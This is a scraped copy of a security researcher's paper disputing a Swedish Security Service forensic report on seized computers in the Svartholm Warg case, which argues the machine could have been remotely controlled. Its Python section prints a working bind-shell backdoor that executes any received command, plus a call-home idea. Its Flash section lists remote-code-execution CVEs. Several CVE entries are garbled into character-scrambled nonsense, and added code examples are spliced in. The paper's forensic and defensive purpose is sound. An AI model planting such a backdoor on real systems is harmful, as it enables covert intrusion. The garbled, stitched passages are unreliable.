comments on the security service investigation of remote control possibilities regarding seizure...

Upload: mary-eng

Post on 04-Jun-2018


  • 8/13/2019 Comments on the Security Service Investigation of Remote Control Possibilities Regarding Seizure Anakata 2012-

    1/29

    Comments on the Security Service Investigation of Remote Control Possibilities regarding seizure 2012-0201-BG25023-26

    Niklas Femerstrand

    IT Security Researcher and Developer


    1. Introduction
    2. The firewall
    3. OpenVPN
    4. Python
    5. Neko
    6. Adobe Flash
    7. Miscellaneous vulnerabilities
    8. Conclusions


    1. Introduction

    This paper responds to the investigation of remote control possibilities regarding seizure 2012-0201-BG25023-26, written by Jesper Blomström, Security Service IT Security Specialist of the Department of Information Security and Preservation of Evidence in IT Environments. This paper is written from a scientific point of view rather than a criminal investigation angle.

    Jesper writes in his investigation report that no "relevant" traces had been found which would strengthen statements made by defendant Gottfrid Svartholm Warg. In this paper I will describe why this is wrong and how the forensics analysis of seizure 2012-0201-BG25023-26 has been lacking.

    Jesper has in his analysis solely focused on software directly mentioned by the defendant in criminal investigative hearings: Powershell Server, Terminal Services and Remote Desktop. By doing this the Security Service has assumed that the defendant has knowledge about how the seized computer would have been remotely controlled when he has in fact denied any knowledge of this repeatedly. This way the Secret Service concludes that it could not find any services installed which could be used for remotely controlling the seized hardware.

    Throughout its investigation the formulated conclusions have systematically been that there are no traces of computers having been remotely controlled. In this specific investigation the formulation shifts to the conclusion that there are no signs of relevant traces of the computer having been remotely controlled. Hence there is a possibility that there are traces that indicate that 2012-0201-BG25023-26 has in fact been remotely controlled but that the criminal investigators have not found them to be relevant in the case.

    The criminal investigators fail to define what they consider relevant. These "irrelevant" traces must be presented so that the court can decide their relevance. It is highly questionable that these irrelevant traces that the forensics analysts have found have been actively excluded from the concluding report.

    It is also unknown what methods the forensics analysts have used to make the conclusions that they have made. I will come back to this point later in the paper.


    2. The firewall

    The Secret Service has isolated their investigation to the locally installed software firewall Windows Firewall. Multiple computers were seized when the defendant was arrested in Phnom Penh, Cambodia, in 2012. This software firewall is not so important that it deserves full focus by the Secret Service. Multiple Internet connected computers were found in the defendant's apartment. In order to connect multiple computers to the Internet from the same location one must first connect the computers into a network and then connect the network to the Internet through a router.

    When the defendant was arrested the following objects were seized and handed over to Swedish Police officers that directly prove the existence of additional firewalls in the network: 7. Wireless Access Point, 10. Modem on, 12. Plastic Cover belonging to a Switch, 27. Plastic Cover belonging to a Router.

    Multiple computers and equipment required to connect multiple computers to a network were found. During the arrest the officers seized the plastic cover belonging to a router but not the router itself. They also did not document what kind of router it was.

    There is no router being manufactured today that does not have a built in firewall as it is a fundamental security requirement for private networks. By using routers with built in firewalls private networks are protected by hardened security against connections being made from the outside to the inside. Normally people rely on the firewall built directly into the router for protection against attacks from the outside.

    Due to the possibilities that the defendant's computer may in fact have been remotely controlled by people connecting from the Internet, the outside of the local private network, it is very important to analyze the configuration on the firewall built into the router.

    In this case officers have neither seized the router, documented the router nor conducted forensics analysis on the router. That there has been at least one firewall in the defendant's network in addition to the software firewall locally installed on the seized computer is an obvious fact.


    On the final page of the report written by the Security Service it is listed that all services in the local software firewall allowed all computers connectivity to all enabled services for any user.

    The defendant is previously convicted for having built the largest filesharing portal in the world. It is therefore very likely that he has opened ports in the router's firewall so that he can illegally download copyrighted material from the Internet. By opening ports in his router's firewall he can immediately become a target for attackers that can exploit vulnerable services. I will return to this point later in the paper.

    Since the router and its included firewall have not been analyzed it is impossible to exclude that these ports could have been used to connect to the seized computer through other means than by connecting to the listening services analyzed in the investigation. In the listed firewall rules it is clear that all allowed services have been allowed traffic on any local and remote port.

    The defendant is convicted for having created the world's largest BitTorrent trackers. Normally BitTorrent clients don't accept communication on one single port but a range of ports. For the sake of example let's say port range 1000-2000. If the defendant has been filesharing on this port range and then accidentally had a vulnerable program accepting communications, for example on port 1500, then consequently an attacker could connect to the vulnerable program on port 1500 and that way hack into the defendant's computer.

    What's important to note here is that a router's firewall rules persist until they are removed either by reconfiguring the firewall rules or by resetting the router configuration entirely. Even if the defendant himself has not been filesharing, or for other reasons opened ports in his firewall built into his router, it is not unlikely that he has had visitors for whom ports have been opened and then forgotten.

    The forensics report does not state if the defendant's computer has used a static or dynamic IP assignment on his network devices. Ports are not only opened in the router, they are more specifically forwarded to a local IP address. Having a dynamic IP address means that the IP address changes every time the computer connects to the network. As an example, the defendant may have had a visitor over a weekend who was assigned IP 192.168.13.37 and then had port 1500 forwarded to it. When the visitor leaves the IP is available and it is possible that one of the times that the defendant's computer connected to the same network the computer was dynamically assigned an IP which had a previous port forwarded to it. This way not only can the defendant's computer have been remotely controlled by someone with authorization but also hacked by unauthorized attackers.
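The stale-forward scenario described above can be checked mechanically when a router's forward table and DHCP lease history are available. The following is an added example, not part of the original paper: the record layout, MAC addresses and dates are constructed assumptions, and only port 1500 and the example address reuse the scenario in the text.

```python
# Added example, not from the original paper. Record layout, MACs and dates
# are constructed; port 1500 and 192.168.13.37 reuse the paper's example.
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class Forward:
    ext_port: int          # port opened on the router's WAN side
    target_ip: str         # LAN address the port is forwarded to
    created: datetime      # when the rule was added


@dataclass(frozen=True)
class Lease:
    ip: str
    mac: str
    start: datetime
    end: datetime


def holder_at(leases, ip, when):
    """Return the MAC that held `ip` at `when`, or None if no lease covers it."""
    for lease in leases:
        if lease.ip == ip and lease.start <= when < lease.end:
            return lease.mac
    return None


def audit_forwards(forwards, leases, now, static_ips=frozenset()):
    """Classify each forward as (ext_port, target_ip, verdict)."""
    findings = []
    for fwd in forwards:
        original = holder_at(leases, fwd.target_ip, fwd.created)
        current = holder_at(leases, fwd.target_ip, now)
        if fwd.target_ip in static_ips:
            verdict = "ok"          # address cannot change hands
        elif original is None:
            verdict = "unknown"     # no record of who the rule was made for
        elif current is None:
            verdict = "orphaned"    # open port waiting for the next lease
        elif current != original:
            verdict = "stale"       # port now reaches a different machine
        else:
            verdict = "ok"
        findings.append((fwd.ext_port, fwd.target_ip, verdict))
    return findings


# Constructed sample data: a weekend visitor, then the same address
# handed to another machine a few days later.
VISITOR = "aa:aa:aa:00:00:01"
DESKTOP = "bb:bb:bb:00:00:02"
STATIC_IPS = frozenset({"192.168.13.10"})

LEASES = [
    Lease("192.168.13.37", VISITOR, datetime(2024, 3, 1, 18), datetime(2024, 3, 3, 20)),
    Lease("192.168.13.50", DESKTOP, datetime(2024, 3, 1, 8), datetime(2024, 3, 2, 8)),
    Lease("192.168.13.37", DESKTOP, datetime(2024, 3, 6, 9), datetime(2024, 3, 7, 9)),
]
FORWARDS = [
    Forward(1500, "192.168.13.37", datetime(2024, 3, 2, 10)),
    Forward(8080, "192.168.13.10", datetime(2024, 1, 5, 12)),
    Forward(2000, "192.168.13.50", datetime(2024, 3, 1, 9)),
]
NOW = datetime(2024, 3, 6, 12)

if __name__ == "__main__":
    for port, ip, verdict in audit_forwards(FORWARDS, LEASES, NOW, STATIC_IPS):
        print(f"{port:>5} -> {ip:<15} {verdict}")
```

A "stale" or "orphaned" verdict is the condition the paragraph describes: the rule outlived the machine it was created for.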

    3. OpenVPN

    The forensics report includes the full Windows Firewall ruleset. On pages 4 and 5 the list includes the following applications: openvpn, OpenVPN GUI and openvpnserv. OpenVPN is an open source software which implements virtual private network (VPN) techniques for creating secure point-to-point connections in routed or bridged configurations and remote access facilities.

    By connecting to a VPN the client computer joins a virtual network that is equally accessible to other computers in the same virtual network as it would be if they were in the same local network.

    OpenVPN has the ability to work through Network Address Translation (NAT) and bypassing firewalls. The seized computer has had both the OpenVPN client and server software installed and allowed in the firewall rules meaning that not only could the defendant's computer connect to other VPN servers but other computers could also connect to his.

    By somehow joining a VPN, either through other clients connecting to the seized computer or by the seized computer connecting to a VPN server, it is possible for other computers in the same VPN to use local shared resources, such as directories shared in the local network, meaning that other computers can have manipulated the contents of the seized computer's hard drive.

    4. Python

    Page 5 in the forensics report lists the Python application. This application is the interpreter for the Python scripting language. Python is a very popular programming language that is executed in real time making it very difficult to know what it's actually doing. The way that it works is that Python reads a file and compiles it to binary format in real time upon execution. Just like all other programs in the Windows Firewall, Python listens on communications from any source IP address on any local protocol and port.


    For example, if an attacker wanted to hack and take full control of the defendant's computer by using Python, he could send a completely legit file to the defendant containing a backdoor. A Python script for remotely controlling a computer could look like this:

        import socket
        import subprocess

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Bind to port 9999 (example) on any network device
        s.bind(("", 9999))
        s.listen()
        # Accept connections from clients
        conn, addr = s.accept()

        # Loop forever
        while True:
            # Read command sent from client
            data = conn.recv(1024)
            # Close link if no command is received
            if not data: break
            print("[+] Connection established")
            # Execute received command
            output = subprocess.check_output(data.decode().rstrip())
            # Send output of executed command back to the client
            conn.send("OUTPUT\n======\n".encode())
            conn.send(output)

        conn.close()

    When running the script above it creates a socket that listens on port 9999 which accepts connections on any network device on the computer. It then waits for clients to connect to it, reads received commands, executes them and returns the command output to the client.

    As an example this is what it looks like when a client connects to the server and lists the files in the current directory:

        $ telnet localhost 9999
        Connected to localhost.
        Escape character is


    In reality a hacker would bind the program to an IP address which is accessible from the Internet. In the case where Python is allowed to communicate with anything on the Internet and anything on the Internet is allowed to communicate with Python due to the set firewall rules, programmatically detecting the IP address which is facing the external world is a simple task. There is a tremendous amount of public websites which tell visitors what IP address they are using and they can be parsed simply. Once the external IP address has been discovered it is only a matter for the script to loop connection attempts to figure out which port an outside hacker can connect to. Once the IP and port have been established the script can start listening on it and then call home to a computer which is controlled by the hacker to find out exactly where he can connect to remotely control the defendant's computer.

    In this scenario, since our backdoor program doesn't write any logs to the hard drive, forensics analysts would fail to find connection traces, simply because none are saved.

    Given the current circumstances of the Windows Firewall configuration this very simple backdoor creates the perfect opportunity to remotely control the defendant's computer.

    In conclusion: the defendant's computer may have been remotely controlled without the defendant's knowledge. The backdoor given as an example would not be detected by antivirus software because it's completely normal networked software behavior.

    6. Neko

    Page 4 in the forensics report lists neko and nekotools. Neko is a programming language that works similarly to Python. Therefore we can conclude that the defendant's computer could also have been remotely controlled via Neko as in the case with Python illustrated above.
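The Python and Neko sections argue that an interpreter-based listener writes nothing to disk, which means the evidence sits in volatile state: the socket table and the process list. The following added example (not part of the original paper) pairs `netstat -ano` output with `tasklist /fo csv /nh` output to flag script interpreters accepting traffic on every interface; the captured text is constructed sample data and the interpreter image names are assumptions.

```python
# Added example, not from the original paper: triage of volatile state.
# Both captures below are constructed sample data.
import csv
import io

# Image names are assumptions based on the applications the paper discusses.
INTERPRETERS = frozenset({"python.exe", "pythonw.exe", "neko.exe"})
WILDCARD = frozenset({"0.0.0.0", "[::]"})   # "any network device"

NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    0.0.0.0:9999           0.0.0.0:0              LISTENING       4312
  TCP    127.0.0.1:8000         0.0.0.0:0              LISTENING       5120
  TCP    192.168.13.37:49712    203.0.113.5:443        ESTABLISHED     2204
  TCP    [::]:9999              [::]:0                 LISTENING       4312
  UDP    0.0.0.0:5000           *:*                                    6001
"""

TASKLIST_SAMPLE = '''\
"svchost.exe","884","Services","0","9,120 K"
"python.exe","4312","Console","1","11,432 K"
"python.exe","5120","Console","1","10,008 K"
"firefox.exe","2204","Console","1","210,556 K"
"neko.exe","6001","Console","1","3,204 K"
'''


def parse_tasklist(text):
    """Map PID -> lower-cased image name from `tasklist /fo csv /nh` output."""
    rows = csv.reader(io.StringIO(text))
    return {int(r[1]): r[0].lower() for r in rows if len(r) >= 2}


def parse_netstat(text):
    """Yield (proto, local_ip, local_port, state, pid) per socket row."""
    for line in text.splitlines():
        f = line.split()
        if not f or f[0] not in ("TCP", "UDP"):
            continue                      # banner, header or blank line
        if f[0] == "UDP" and len(f) == 4:
            state, pid = "", f[3]         # UDP rows have no State column
        elif len(f) == 5:
            state, pid = f[3], f[4]
        else:
            continue                      # malformed row
        ip, _, port = f[1].rpartition(":")  # keeps "[::]" intact
        yield f[0], ip, int(port), state, int(pid)


def exposed_interpreters(netstat_text, tasklist_text, interpreters=INTERPRETERS):
    """Return sockets owned by an interpreter that accept traffic on all interfaces."""
    images = parse_tasklist(tasklist_text)
    hits = []
    for proto, ip, port, state, pid in parse_netstat(netstat_text):
        # A bound UDP socket receives datagrams without a LISTENING state.
        accepting = proto == "UDP" or state == "LISTENING"
        image = images.get(pid, "<unknown>")
        if accepting and ip in WILDCARD and image in interpreters:
            hits.append((proto, ip, port, pid, image))
    return hits


if __name__ == "__main__":
    for hit in exposed_interpreters(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print(*hit)
```

The loopback-only interpreter (PID 5120) and the non-interpreter service on port 135 are deliberately not reported; only wildcard binds owned by an interpreter are.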


    7. Adobe Flash

    Page 3 in the forensics report reveals that the following versions of Adobe Flash have not only been installed but had full abilities to accept and send network traffic between the seized computer: Adobe Flash Player 11.0 r1, Adobe Flash 11.2, Adobe Flash 11.3 and Adobe Flash 11.4. Adobe Flash is a multimedia and software platform used for authoring of vector graphics, animation, games and rich Internet applications (RIAs) that can be viewed, played and executed in Adobe Flash Player.

    Below is a list of security vulnerabilities that the defendant's installed versions of Adobe Flash are vulnerable to. Only those that enable hackers to take control of the defendant's computer by remotely executing malicious code are listed:

    CVE-2013-3347 http://www.cvedetails.com/cve/CVE-2013-3347/
    Integer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via PCM data that is not properly handled during resampling.

    CVE-2013-3345 http://www.cvedetails.com/cve/CVE-2013-3345/
    Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

    CVE-2013-3344 http://www.cvedetails.com/cve/CVE-2013-3344/
    Heap-based buffer overflow in Adobe Flash Player before 11.7.700.232 and 11.8.x before 11.8.800.94 on Windows and Mac OS X, before 11.2.202.297 on Linux, before 11.1.111.64 on Android 2.x and 3.x, and before 11.1.115.69 on Android 4.x allows attackers to execute arbitrary code via unspecified vectors.

    CVE-2013-3343 http://www.cvedetails.com/cve/CVE-2013-3343/
    Adobe Flash Player before 10.3.183.90 and 11.x before 11.7.700.224 on Windows, before 10.3.183.90 and 11.x before 11.7.700.225 on Mac OS X, before 10.3.183.90 and 11.x before 11.2.202.291 on Linux, before 11.1.111.59 on Android 2.x and 3.x, and before 11.1.115.63 on Android 4.x; Adobe AIR before 3.7.0.2090 on Windows and Android and before 3.7.0.2100 on Mac OS X; and Adobe AIR SDK & Compiler before 3.7.0.2090 on Windows and before 3.7.0.2100 on Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.


    CVE-2013-3335 http://www.cvedetails.com/cve/CVE-2013-3335/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3325, CVE-2013-3326, CVE-2013-3327, CVE-2013-3328, CVE-2013-3329, CVE-2013-3330, CVE-2013-3331, CVE-2013-3332, CVE-2013-3333, and CVE-2013-3334.

    CVE-2013-3334 http://www.cvedetails.com/cve/CVE-2013-3334/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3325, CVE-2013-3326, CVE-2013-3327, CVE-2013-3328, CVE-2013-3329, CVE-2013-3330, CVE-2013-3331, CVE-2013-3332, CVE-2013-3333, and CVE-2013-3335.

    CVE-2013-3333 http://www.cvedetails.com/cve/CVE-2013-3333/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3325, CVE-2013-3326, CVE-2013-3327, CVE-2013-3328, CVE-2013-3329, CVE-2013-3330, CVE-2013-3331, CVE-2013-3332, CVE-2013-3334, and CVE-2013-3335.

    CVE-2013-3332 http://www.cvedetails.com/cve/CVE-2013-3332/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3325, CVE-2013-3326, CVE-2013-3327, CVE-2013-3328, CVE-2013-3329, CVE-2013-3330, CVE-2013-3331, CVE-2013-3333, CVE-2013-3334, and CVE-2013-3335.

    CVE-2013-3331 http://www.cvedetails.com/cve/CVE-2013-3331/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3325, CVE-2013-3326, CVE-2013-3327, CVE-2013-3328, CVE-2013-3329, CVE-2013-3330, CVE-2013-3332, CVE-2013-3333, CVE-2013-3334, and CVE-2013-3335.


    CVE-2013-3330 http://www.cvedetails.com/cve/CVE-2013-3330/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3325, CVE-2013-3326, CVE-2013-3327, CVE-2013-3328, CVE-2013-3329, CVE-2013-3331, CVE-2013-3332, CVE-2013-3333, CVE-2013-3334, and CVE-2013-3335.

    CVE-2013-3329 http://www.cvedetails.com/cve/CVE-2013-3329/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3325, CVE-2013-3326, CVE-2013-3327, CVE-2013-3328, CVE-2013-3330, CVE-2013-3331, CVE-2013-3332, CVE-2013-3333, CVE-2013-3334, and CVE-2013-3335.

    CVE-2013-3328 http://www.cvedetails.com/cve/CVE-2013-3328/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3325, CVE-2013-3326, CVE-2013-3327, CVE-2013-3329, CVE-2013-3330, CVE-2013-3331, CVE-2013-3332, CVE-2013-3333, CVE-2013-3334, and CVE-2013-3335.

    CVE-2013-3327 http://www.cvedetails.com/cve/CVE-2013-3327/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3325, CVE-2013-3326, CVE-2013-3328, CVE-2013-3329, CVE-2013-3330, CVE-2013-3331, CVE-2013-3332, CVE-2013-3333, CVE-2013-3334, and CVE-2013-3335.

    CVE-2013-3326 http://www.cvedetails.com/cve/CVE-2013-3326/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3325, CVE-2013-3327, CVE-2013-3328, CVE-2013-3329, CVE-2013-3330, CVE-2013-3331, CVE-2013-3332, CVE-2013-3333, CVE-2013-3334, and CVE-2013-3335.


    CVE-2013-3325 http://www.cvedetails.com/cve/CVE-2013-3325/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3324, CVE-2013-3326, CVE-2013-3327, CVE-2013-3328, CVE-2013-3329, CVE-2013-3330, CVE-2013-3331, CVE-2013-3332, CVE-2013-3333, CVE-2013-3334, and CVE-2013-3335.

    CVE-2013-3324 http://www.cvedetails.com/cve/CVE-2013-3324/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2728, CVE-2013-3325, CVE-2013-3326, CVE-2013-3327, CVE-2013-3328, CVE-2013-3329, CVE-2013-3330, CVE-2013-3331, CVE-2013-3332, CVE-2013-3333, CVE-2013-3334, and CVE-2013-3335.

    CVE-2013-2728 http://www.cvedetails.com/cve/CVE-2013-2728/
    Adobe Flash Player before 10.3.183.86 and 11.x before 11.7.700.202 on Windows and Mac OS X, before 10.3.183.86 and 11.x before 11.2.202.285 on Linux, before 11.1.111.54 on Android 2.x and 3.x, and before 11.1.115.58 on Android 4.x; Adobe AIR before 3.7.0.1860; and Adobe AIR SDK & Compiler before 3.7.0.1860 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-3324, CVE-2013-3325, CVE-2013-3326, CVE-2013-3327, CVE-2013-3328, CVE-2013-3329, CVE-2013-3330, CVE-2013-3331, CVE-2013-3332, CVE-2013-3333, CVE-2013-3334, and CVE-2013-3335.

    CVE-2013-2555 http://www.cvedetails.com/cve/CVE-2013-2555/
    Integer overflow in Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x; Adobe AIR before 3.7.0.1530; and Adobe AIR SDK & Compiler before 3.7.0.1530 allows remote attackers to execute arbitrary code via unspecified vectors, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013.

    CVE-2013-1380 http://www.cvedetails.com/cve/CVE-2013-1380/
    Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x; Adobe AIR before 3.7.0.1530; and Adobe AIR SDK & Compiler before 3.7.0.1530 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1378.

    CVE-2013-1379 http://www.cvedetails.com/cve/CVE-2013-1379/
    Adobe Flash Player before 10.3.183.75 and 11.x before 11.7.700.169 on Windows and Mac OS X, before 10.3.183.75 and 11.x before 11.2.202.280 on Linux, before 11.1.111.50 on Android 2.x and 3.x, and before 11.1.115.54 on Android 4.x; Adobe AIR before 3.7.0.1530; and Adobe AIR SDK & Compiler before 3.7.0.1530 do not properly initialize pointer arrays, which allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.


    C)-201"-1"/ htt(344&&&$cvedetails$com4cve4C)-201"-1"/4

    =do"e Flash 1layer "e!ore &%.+.&B+.* and &&.8 "e!ore &&..%%.&,A on 5indo-s and 9ac S 0

    "e!ore &%.+.&B+.* and &&.8 "e!ore &&.$.$%$.$B% on Jinu80 "e!ore &&.&.&&&.*% on =ndroid $.8 and +.80

    and "e!ore &&.&.&&*.*C on =ndroid C.8H =do"e =IR "e!ore +..%.&*+%H and =do"e =IR SDK L:ompiler "e!ore +..%.&*+% allo- attackers to e8ecute ar"itrary code or cause a denial o! service

    memory corruptionG via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'&+B%.

    C)-201"-1"/! htt(344&&&$cvedetails$com4cve4C)-201"-1"/!4

    7eap'"ased "u!!er over!lo- in =do"e Flash 1layer "e!ore &%.+.&B+.,B and &&.8 "e!ore &&.,.,%$.&B% on

    5indo-s and 9ac S 0 "e!ore &%.+.&B+.,B and &&.8 "e!ore &&.$.$%$.$* on Jinu80 "e!ore&&.&.&&&.CC on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.CB on =ndroid C.8H =do"e =IR "e!ore

    +.,.%.,%A%H =do"e =IR SDK "e!ore +.,.%.,%A%H and =do"e =IR SDK L :ompiler "e!ore +.,.%.,%A%

    allo-s attackers to e8ecute ar"itrary code via unspeci!ied vectors.

    C)-201"-1"/+ htt(344&&&$cvedetails$com4cve4C)-201"-1"/+4

    Ese'a!ter'!ree vulnera"ility in =do"e Flash 1layer "e!ore &%.+.&B+.,+ and &&.8 "e!ore &&.,.,%$.&,B on

    5indo-s0 "e!ore &%.+.&B+.,& and &&.8 "e!ore &&.,.,%$.&, on 9ac S 0 "e!ore &%.+.&B+.,& and &&.8"e!ore &&.$.$%$.$% on Jinu80 "e!ore &&.&.&&&.C+ on =ndroid $.8 and +.80 and "e!ore &&.&.&&*.C on

    =ndroid C.8H =do"e =IR "e!ore +.,.%.*AH and =do"e =IR SDK "e!ore +.,.%.*AA allo-s attackers to

    e8ecute ar"itrary code via unspeci!ied vectors0 a di!!erent vulnera"ility than :2'$%&+'%,CC and :2'$%&+'%,CA.

    CVE-2013-1373 http://www.cvedetails.com/cve/CVE-2013-1373/

    Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0642, CVE-2013-0645, CVE-2013-1365, CVE-2013-1366, CVE-2013-1367, CVE-2013-1368, CVE-2013-1369, CVE-2013-1370, and CVE-2013-1372.

    CVE-2013-1372 http://www.cvedetails.com/cve/CVE-2013-1372/

    Buffer overflow in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0642, CVE-2013-0645, CVE-2013-1365, CVE-2013-1366, CVE-2013-1367, CVE-2013-1368, CVE-2013-1369, CVE-2013-1370, and CVE-2013-1373.

    CVE-2013-1371 http://www.cvedetails.com/cve/CVE-2013-1371/

